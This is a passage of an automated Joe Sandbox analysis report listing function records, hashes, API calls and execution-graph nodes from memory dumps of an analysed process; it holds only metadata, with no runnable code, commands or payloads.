                                                                                                    • Instruction Fuzzy Hash: 2C11D2B6C006498FDB10CF9AC444ADEFBF8AF89324F14842AD459B7741D3B5A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0707A055
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost
                                                                                                    • String ID:
                                                                                                    • API String ID: 410705778-0
                                                                                                    • Opcode ID: 6fb4c527f39df8e5ed40ae5008efe7ba6e23db10271a0c6e71d7a3e2fe13fa2d
                                                                                                    • Instruction ID: fcc05d90e8f8effa8eaf0168eae9ef21fd461a53f0b86dc02dc7bd76aa9c4d7a
                                                                                                    • Opcode Fuzzy Hash: 6fb4c527f39df8e5ed40ae5008efe7ba6e23db10271a0c6e71d7a3e2fe13fa2d
                                                                                                    • Instruction Fuzzy Hash: 5F11F2B58003498FDB10CF99C985BDEBBF8FB48325F24881AD954B3640C379A944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0707A055
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost
                                                                                                    • String ID:
                                                                                                    • API String ID: 410705778-0
                                                                                                    • Opcode ID: 325989cfafe4460d65568c96a75759639fbcc74c1263ed9446321729fd04c01d
                                                                                                    • Instruction ID: fc0e293286547a91e01cd7b80e449a44d58652055a7b768830b86f242e5934b7
                                                                                                    • Opcode Fuzzy Hash: 325989cfafe4460d65568c96a75759639fbcc74c1263ed9446321729fd04c01d
                                                                                                    • Instruction Fuzzy Hash: D011D3B59002499FDB10CF99C489BDEBBF8EB48324F14881AE554A7640C375A954CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.305946581.0000000000C0D000.00000040.00000001.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_c0d000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1ec89893061ca52fabeb52ad47c2d8e2ae9c13947909b396c7d89bd8c027fb1
                                                                                                    • Instruction ID: f0a842ea568ebc0870613d5a94b98b8de12f5f9a6e6b7c8d57bf92d961d2a1eb
                                                                                                    • Opcode Fuzzy Hash: f1ec89893061ca52fabeb52ad47c2d8e2ae9c13947909b396c7d89bd8c027fb1
                                                                                                    • Instruction Fuzzy Hash: 012125B1500240DFCB05DF94D9C0F26BF65FB88728F248969EC060B286C336E946DBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.305973663.0000000000C1D000.00000040.00000001.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_c1d000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 23668e96a3acee05eb93593fbe4ba78837d5cd19cca5bce60b021a71b7a50ab5
                                                                                                    • Instruction ID: 03adfcccaf1e7e2e927d79c7d18536597711bb645e71ed84c87b1e17d67741b6
                                                                                                    • Opcode Fuzzy Hash: 23668e96a3acee05eb93593fbe4ba78837d5cd19cca5bce60b021a71b7a50ab5
                                                                                                    • Instruction Fuzzy Hash: 3F210771504240EFDB05CF54D9C4B66BBA5FB85324F24CAADE81A4B346C336DC86DB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.305973663.0000000000C1D000.00000040.00000001.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_c1d000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 07f4dab952ba27276f7ed9db4e554799a28519ad264c9921e02906fb193da43a
                                                                                                    • Instruction ID: 3030cc7a3dcd6bb26e004b7740bbdd4b5684870a926e5af24c3fdebf11c20934
                                                                                                    • Opcode Fuzzy Hash: 07f4dab952ba27276f7ed9db4e554799a28519ad264c9921e02906fb193da43a
                                                                                                    • Instruction Fuzzy Hash: 94210775504240DFCB14CF24D9C4B56BB65FB89324F24C9ADE80A4B346C33AD887DB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.305973663.0000000000C1D000.00000040.00000001.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_c1d000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 846adf146bee012e41efba04c4542390c97575c6871f8a8a7dc4d6e9dd8f187d
                                                                                                    • Instruction ID: a6bdef66b626befc32eeb39d6200a63517d7da097551cb51599549178d76204e
                                                                                                    • Opcode Fuzzy Hash: 846adf146bee012e41efba04c4542390c97575c6871f8a8a7dc4d6e9dd8f187d
                                                                                                    • Instruction Fuzzy Hash: CA2192755093C08FCB02CF24D990755BF71EB46314F28C5EAD8498F697C33A984ACB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.305946581.0000000000C0D000.00000040.00000001.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_c0d000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bfec3cb27130703432ebaa7756116e99e0261673e76136829534a65b319a9084
                                                                                                    • Instruction ID: 141f55d2ad2d8945bbd787c1dba1e072fa233c207e6b124d07c119c8ad93e96a
                                                                                                    • Opcode Fuzzy Hash: bfec3cb27130703432ebaa7756116e99e0261673e76136829534a65b319a9084
                                                                                                    • Instruction Fuzzy Hash: 3911B1B6404280CFCB11CF54D9C4B16BF71FB98324F28C6A9DC450B656C336D95ACBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.305973663.0000000000C1D000.00000040.00000001.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_c1d000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9208e13c3bd025f0449ca73fc4c5ca3d46b29aae9db9ab7ac54b4ecb103c7ef5
                                                                                                    • Instruction ID: 72e2f2be228a0b06257af2899298ba140fd62b4c2f0cac7d736f2376fafe20bd
                                                                                                    • Opcode Fuzzy Hash: 9208e13c3bd025f0449ca73fc4c5ca3d46b29aae9db9ab7ac54b4ecb103c7ef5
                                                                                                    • Instruction Fuzzy Hash: 0D11BB75904280DFCB01CF14C5C0B55BBA1FB85324F28C6A9D85A4B656C33AD89ACB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.305946581.0000000000C0D000.00000040.00000001.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_c0d000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 914636b2cc33e46e58634c8fbcdb4b1311812691c0cf0e04f39ffd35cc5e5880
                                                                                                    • Instruction ID: dda54dd002ce530f6663ae4b7fcfbd4681aee8b42ad6ab6fefd4a67069fe3c37
                                                                                                    • Opcode Fuzzy Hash: 914636b2cc33e46e58634c8fbcdb4b1311812691c0cf0e04f39ffd35cc5e5880
                                                                                                    • Instruction Fuzzy Hash: A601F7714043409AEB104BA9CCC4BA6BBDCEF91338F18895AED165B2CAD3799845CAB1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.305946581.0000000000C0D000.00000040.00000001.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_c0d000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 61a3ba5c75aaf226f7884910967ae6f4870c5c7d3f045022e40968eed1d8090c
                                                                                                    • Instruction ID: 9e195363ee917905cd3109425cbf6305be649ed14f97c2fd18972cc54ff51d8c
                                                                                                    • Opcode Fuzzy Hash: 61a3ba5c75aaf226f7884910967ae6f4870c5c7d3f045022e40968eed1d8090c
                                                                                                    • Instruction Fuzzy Hash: 97F06D71404394AAEB108F59CC88B62FFD8EB96734F18C45AED195F28AC3799844CAB1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: F$UUUU$`F"e$pR}]
                                                                                                    • API String ID: 0-3286258706
                                                                                                    • Opcode ID: 9de57dfb85f1bb1f56c600c9e7a0894b50ed09a688594818ed66f255811bddf5
                                                                                                    • Instruction ID: 7c22484c37c136f77ca7e5c97042f4af8ffa4defaf357ce8977bda76cc28e3a8
                                                                                                    • Opcode Fuzzy Hash: 9de57dfb85f1bb1f56c600c9e7a0894b50ed09a688594818ed66f255811bddf5
                                                                                                    • Instruction Fuzzy Hash: 706162B0E10629CFEB64CFA9C880B8DB7F1BB48314F1486A9D42CE7246D7349A85CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f42d036f0035b65bc7aa2b85cc9524b085138046ef76ca61b183a9aefd8211ad
                                                                                                    • Instruction ID: 23ee5272e98de907d8be6417a71aab6bb2aecce000debcd10eeac90b52aa6117
                                                                                                    • Opcode Fuzzy Hash: f42d036f0035b65bc7aa2b85cc9524b085138046ef76ca61b183a9aefd8211ad
                                                                                                    • Instruction Fuzzy Hash: B012B5F1411F4ACAD730CF65EC9A6993B60B785B28B904308D2615BAF1D7B8118BEF84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c982494f258c69c7ed20cdeb6f123b2e1c9f864a93a7497010a3b3594a9c5f0a
                                                                                                    • Instruction ID: e09126d3c008a484d44a4e42f8b324fd9053cb591be8c02472559416336128da
                                                                                                    • Opcode Fuzzy Hash: c982494f258c69c7ed20cdeb6f123b2e1c9f864a93a7497010a3b3594a9c5f0a
                                                                                                    • Instruction Fuzzy Hash: 8DA19132E00219CFCF15DFA5C8445DEBBB2FF84310B19856AE905BB2A1DB35A945EB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.306091297.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f00000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dc97ae6b309c5d6f8f9fe22743af9f6a9392997ef6862affa0c62cf1cffe136d
                                                                                                    • Instruction ID: f983add612d57fd4f135a31fcd29bfc7ac8a3168e89985b585b27af1e1e872fe
                                                                                                    • Opcode Fuzzy Hash: dc97ae6b309c5d6f8f9fe22743af9f6a9392997ef6862affa0c62cf1cffe136d
                                                                                                    • Instruction Fuzzy Hash: CFC13BB1811F4ACBD720DF65EC8A1893B71FB85B28F514309D2616B6E0D7B8148BEF84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 093bedbc50c92004375061b5525e3b59b49d80dd24fd45eaa22b9082a2a7b97f
                                                                                                    • Instruction ID: ecbcd95c3eb3fc8d27ab68222630e2cdd111e5ff90642d8087ecebe25b57d37f
                                                                                                    • Opcode Fuzzy Hash: 093bedbc50c92004375061b5525e3b59b49d80dd24fd45eaa22b9082a2a7b97f
                                                                                                    • Instruction Fuzzy Hash: 785183B1D056598BD719CF6B8D0029AFBF3AFC5200F18C1FA895CAA265EB340946CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.310089694.0000000007070000.00000040.00000001.sdmp, Offset: 07070000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7070000_20220114080343434.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 385e5f3ea5214dd4a67e677604d567f828fb930a40e6672fcf14b385778c2b28
                                                                                                    • Instruction ID: e68887df92b8e0d4c73409c7debd547a82366143ffd0232a438c2c62f58f40f6
                                                                                                    • Opcode Fuzzy Hash: 385e5f3ea5214dd4a67e677604d567f828fb930a40e6672fcf14b385778c2b28
                                                                                                    • Instruction Fuzzy Hash: D44151B1E056588BEB5CCF6B8D4078EFAF7AFC9200F14C5BA951CA6255EB3009868E14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:9.4%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:3.2%
                                                                                                    Total number of Nodes:155
                                                                                                    Total number of Limit Nodes:19

                                                                                                    Graph

                                                                                                    execution_graph 35056 1689c78 35057 1689c97 LdrInitializeThunk 35056->35057 35059 1689ccb 35057->35059 35060 168bc38 35061 168bc59 35060->35061 35066 1689bd8 35061->35066 35063 168bc89 35064 1689bd8 LdrInitializeThunk 35063->35064 35065 168bcba 35063->35065 35064->35065 35067 1689be9 35066->35067 35069 1689c0c 35066->35069 35067->35063 35068 1689c39 35068->35063 35069->35068 35070 1689caf LdrInitializeThunk 35069->35070 35071 1689ccb 35070->35071 35072 168c148 35075 168c169 35072->35075 35073 168c345 35074 168c413 LdrInitializeThunk 35076 168c430 35074->35076 35075->35073 35075->35074 35077 168f618 35078 168f626 35077->35078 35080 168f649 35077->35080 35079 168f66e 35080->35079 35087 168e4e0 35080->35087 35082 168f89d 35093 168e528 35082->35093 35084 168f8be 35085 168e528 4 API calls 35084->35085 35086 168f8fe 35085->35086 35088 168e4ee 35087->35088 35090 168e511 35087->35090 35088->35082 35089 168e576 35089->35082 35090->35089 35098 168e8df 35090->35098 35111 168e8f0 35090->35111 35095 168e54d 35093->35095 35094 168e576 35094->35084 35095->35094 35096 168e8df 4 API calls 35095->35096 35097 168e8f0 4 API calls 35095->35097 35096->35094 35097->35094 35099 168e8ea 35098->35099 35100 168e95f 35098->35100 35110 168e8df 3 API calls 35099->35110 35116 168e928 35099->35116 35124 168e918 35099->35124 35104 168e97a 35100->35104 35132 1689380 35100->35132 35102 168e97e 35102->35089 35103 168e8fe 35103->35089 35104->35102 35105 168ea46 GlobalMemoryStatusEx 35104->35105 35107 168e9e3 35104->35107 35106 168ea76 35105->35106 35106->35089 35107->35089 35110->35103 35113 168e928 2 API calls 35111->35113 35114 168e918 2 API calls 35111->35114 35115 168e8df 4 API calls 35111->35115 35112 168e8fe 35112->35089 35113->35112 35114->35112 35115->35112 35117 168e95d 35116->35117 35118 168e935 35116->35118 35119 1689380 GlobalMemoryStatusEx 35117->35119 35118->35103 35122 168e97a 35119->35122 35120 168ea46 GlobalMemoryStatusEx 35121 168ea76 35120->35121 35121->35103 35122->35120 35123 168e97e 35122->35123 35123->35103 35125 168e95d 35124->35125 35126 168e935 35124->35126 35127 1689380 GlobalMemoryStatusEx 35125->35127 35126->35103 35130 168e97a 35127->35130 35128 168ea46 GlobalMemoryStatusEx 35129 168ea76 35128->35129 35129->35103 35130->35128 35131 168e97e 35130->35131 35131->35103 35133 168ea00 GlobalMemoryStatusEx 35132->35133 35135 168ea76 35133->35135 35135->35104 35136 168d098 35137 168d0a0 35136->35137 35138 168d0a9 35137->35138 35139 168e528 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35137->35139 35140 168e45a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35137->35140 35141 168e4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35137->35141 35143 168e634 35137->35143 35139->35137 35140->35137 35141->35137 35145 168e635 35143->35145 35144 168e677 35144->35137 35145->35144 35146 168e8df 4 API calls 35145->35146 35147 168e8f0 4 API calls 35145->35147 35146->35144 35147->35144 34962 1721f70 34963 1721f7f 34962->34963 34966 1721964 34963->34966 34967 172196f 34966->34967 34970 1721a00 34967->34970 34969 1722076 34969->34969 34975 1721a0b 34970->34975 34971 172277d 34972 17227ad 34971->34972 34973 1722474 OleInitialize 34971->34973 34976 17227c5 34972->34976 34983 1722474 34972->34983 34973->34972 34975->34971 34975->34976 34978 1723ea0 34975->34978 34976->34969 34980 1723ec1 34978->34980 34979 1723ee5 34979->34971 34980->34979 34987 1724050 34980->34987 34991 1724040 34980->34991 34984 172247f 34983->34984 34986 172bde1 34984->34986 35045 172b1c4 34984->35045 34986->34976 34989 172405d 34987->34989 34988 1724096 34988->34979 34989->34988 34995 1723390 34989->34995 34993 1724050 34991->34993 34992 1724096 34992->34979 34993->34992 34994 1723390 LoadLibraryExW 34993->34994 34994->34992 34996 172339b 34995->34996 34998 1724108 34996->34998 34999 17233c4 34996->34999 35000 17233cf 34999->35000 35006 17233d4 35000->35006 35002 1724177 35010 1728318 35002->35010 35016 1728300 35002->35016 35003 17241b0 35003->34998 35007 17233df 35006->35007 35008 17244ac 35007->35008 35009 1723ea0 LoadLibraryExW 35007->35009 35008->35002 35009->35008 35012 1728349 35010->35012 35013 1728395 35010->35013 35011 1728355 35011->35003 35012->35011 35022 1728570 35012->35022 35026 1728580 35012->35026 35013->35003 35018 1728349 35016->35018 35019 1728395 35016->35019 35017 1728355 35017->35003 35018->35017 35020 1728570 LoadLibraryExW 35018->35020 35021 1728580 LoadLibraryExW 35018->35021 35019->35003 35020->35019 35021->35019 35023 1728580 35022->35023 35030 17285b3 35023->35030 35024 172858a 35024->35013 35027 1728581 35026->35027 35029 17285b3 LoadLibraryExW 35027->35029 35028 172858a 35028->35013 35029->35028 35031 17285d3 35030->35031 35033 17285eb 35031->35033 35035 17285b3 LoadLibraryExW 35031->35035 35037 17287a0 35031->35037 35032 17285e3 35032->35033 35041 1727944 35032->35041 35033->35024 35035->35032 35038 17287b4 35037->35038 35039 1727944 LoadLibraryExW 35038->35039 35040 17287d9 35038->35040 35039->35040 35040->35032 35042 1728800 LoadLibraryExW 35041->35042 35044 1728879 35042->35044 35044->35033 35046 172b1cf 35045->35046 35047 172c0fb 35046->35047 35049 172b1e0 35046->35049 35047->34986 35050 172c130 OleInitialize 35049->35050 35051 172c194 35050->35051 35051->35047 35052 147ee40 35055 147ee5e 35052->35055 35053 147f0fa 35054 147f07f BasepProcessInvalidImage 35054->35055 35055->35053 35055->35054

                                                                                                    Executed Functions

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1080 168c148-168c1a6 1087 168c1ac-168c1d7 1080->1087 1088 168c345-168c34f 1080->1088 1092 168c1dd-168c1ff 1087->1092 1093 168c355-168c37f 1087->1093 1092->1088 1096 168c205-168c20e 1092->1096 1097 168c381-168c38b 1093->1097 1098 168c3a4-168c42a call 1686008 call 1686120 LdrInitializeThunk 1093->1098 1096->1093 1099 168c214-168c21c 1096->1099 1100 168c38d-168c39e 1097->1100 1101 168c3a0-168c3a3 1097->1101 1128 168c430-168c44a 1098->1128 1129 168c573-168c590 1098->1129 1103 168c330-168c334 1099->1103 1104 168c222-168c235 1099->1104 1100->1101 1105 168c350 1103->1105 1106 168c336-168c33f 1103->1106 1113 168c31a-168c32b 1104->1113 1114 168c23b-168c27f 1104->1114 1105->1093 1106->1088 1106->1096 1113->1103 1114->1113 1134 168c285-168c29f 1114->1134 1128->1129 1135 168c450-168c46a 1128->1135 1147 168c595-168c59e 1129->1147 1134->1113 1140 168c2a1-168c2b7 1134->1140 1141 168c46c-168c46e 1135->1141 1142 168c470 1135->1142 1140->1113 1149 168c2b9-168c2d2 1140->1149 1143 168c473-168c4ce call 1689094 1141->1143 1142->1143 1161 168c4d0-168c4d2 1143->1161 1162 168c4d4 1143->1162 1149->1113 1156 168c2d4-168c318 1149->1156 1156->1103 1163 168c4d7-168c571 call 1689094 1161->1163 1162->1163 1163->1147
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556994309.0000000001680000.00000040.00000010.sdmp, Offset: 01680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1680000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 0ba28d801832af433ad29989c6585d9cc525019d1f35ee9c508181cf9c83fb97
                                                                                                    • Instruction ID: 05d384151e60df3d9db5a793d8f3ec2046c5837f416ee5638bf43ec11a44b7f1
                                                                                                    • Opcode Fuzzy Hash: 0ba28d801832af433ad29989c6585d9cc525019d1f35ee9c508181cf9c83fb97
                                                                                                    • Instruction Fuzzy Hash: A3C1E330A002058FCB54EFB8D848AAEB7F6BF84215F14C56ED5069B395DF30DC468BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 567 1689bd8-1689be7 568 1689be9-1689bf3 567->568 569 1689c0c-1689c37 567->569 570 1689c08-1689c0b 568->570 571 1689bf5-1689c06 568->571 574 1689c39-1689c43 569->574 575 1689c5c-1689cc4 LdrInitializeThunk 569->575 571->570 576 1689c58-1689c5b 574->576 577 1689c45-1689c56 574->577 583 1689ccb-1689cd7 575->583 577->576 584 1689ed8-1689eeb 583->584 585 1689cdd-1689ce6 583->585 586 1689f12-1689f16 584->586 587 1689cec-1689d01 585->587 588 1689f0d 585->588 589 1689f18 586->589 590 1689f21 586->590 592 1689d1b-1689d36 587->592 593 1689d03-1689d16 587->593 588->586 589->590 594 1689f22 590->594 602 1689d38-1689d42 592->602 603 1689d44 592->603 595 1689eac-1689eb0 593->595 594->594 597 1689ebb-1689ebc 595->597 598 1689eb2 595->598 597->584 598->597 604 1689d49-1689d4b 602->604 603->604 605 1689d4d-1689d60 604->605 606 1689d65-1689dfe 604->606 605->595 624 1689e0c 606->624 625 1689e00-1689e0a 606->625 626 1689e11-1689e13 624->626 625->626 627 1689e15-1689e17 626->627 628 1689e56-1689eaa 626->628 629 1689e19-1689e23 627->629 630 1689e25 627->630 628->595 632 1689e2a-1689e2c 629->632 630->632 632->628 633 1689e2e-1689e54 632->633 633->628
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556994309.0000000001680000.00000040.00000010.sdmp, Offset: 01680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1680000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: U
                                                                                                    • API String ID: 2994545307-3372436214
                                                                                                    • Opcode ID: d9848272fdd7089ddfc55503adb97f5003a62050def5980254a6f233f66d6859
                                                                                                    • Instruction ID: 4b1b64907d6d941357e92a25ba6e4ce62bb5abe20854c5cc5ef4790479c4473f
                                                                                                    • Opcode Fuzzy Hash: d9848272fdd7089ddfc55503adb97f5003a62050def5980254a6f233f66d6859
                                                                                                    • Instruction Fuzzy Hash: 7741A030A05349CFDB05EB78C848AADBBB2AF85308F1584BAD405AB396DB35DC46CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1186 147ede0-147edff 1187 147ee24-147eeb2 1186->1187 1188 147ee01-147ee0b 1186->1188 1202 147eee5-147ef0e 1187->1202 1203 147eeb4-147eec8 1187->1203 1189 147ee20-147ee23 1188->1189 1190 147ee0d-147ee1e 1188->1190 1190->1189 1212 147ef41-147ef7a 1202->1212 1213 147ef10-147ef24 1202->1213 1208 147eecf 1203->1208 1210 147eed6-147eede 1208->1210 1210->1202 1216 147f141-147f15f 1212->1216 1217 147ef80-147ef88 call 147f2f5 1212->1217 1221 147ef2b 1213->1221 1222 147f160 1216->1222 1220 147ef8e-147efa5 1217->1220 1226 147efac 1220->1226 1224 147ef32-147ef3a 1221->1224 1222->1222 1224->1212 1227 147efb3-147efd4 1226->1227 1231 147f0fa-147f11e 1227->1231 1232 147efda-147f03b 1227->1232 1237 147f120 1231->1237 1238 147f129-147f12a 1231->1238 1247 147f041-147f053 1232->1247 1248 147f0e9-147f0f4 1232->1248 1237->1238 1238->1216 1252 147f059-147f067 1247->1252 1248->1231 1248->1232 1254 147f071-147f075 1252->1254 1255 147f07f-147f08e BasepProcessInvalidImage 1254->1255 1256 147f098-147f09c 1255->1256 1257 147f0b6 1256->1257 1258 147f09e-147f0a4 1256->1258 1261 147f0bc-147f0cd 1257->1261 1259 147f0a6 1258->1259 1260 147f0a8-147f0b4 1258->1260 1259->1257 1260->1257 1264 147f0d6 1261->1264 1264->1248
                                                                                                    APIs
                                                                                                    • BasepProcessInvalidImage.KERNEL32 ref: 0147F083
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556279028.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1470000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BasepImageInvalidProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 254064073-0
                                                                                                    • Opcode ID: ceec1257db461c743c7b8b7d28d1564d084c4bcfe6aafed69b8f1794ad1fee6f
                                                                                                    • Instruction ID: 9f140d069316948096287322c53463d8d6c2d793e9a2c954442c0834c2155bf8
                                                                                                    • Opcode Fuzzy Hash: ceec1257db461c743c7b8b7d28d1564d084c4bcfe6aafed69b8f1794ad1fee6f
                                                                                                    • Instruction Fuzzy Hash: 8A818034B042448FDB14DBB9D4287AE7AF7AFC9704F15846AE506DB3A4EF749C028792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
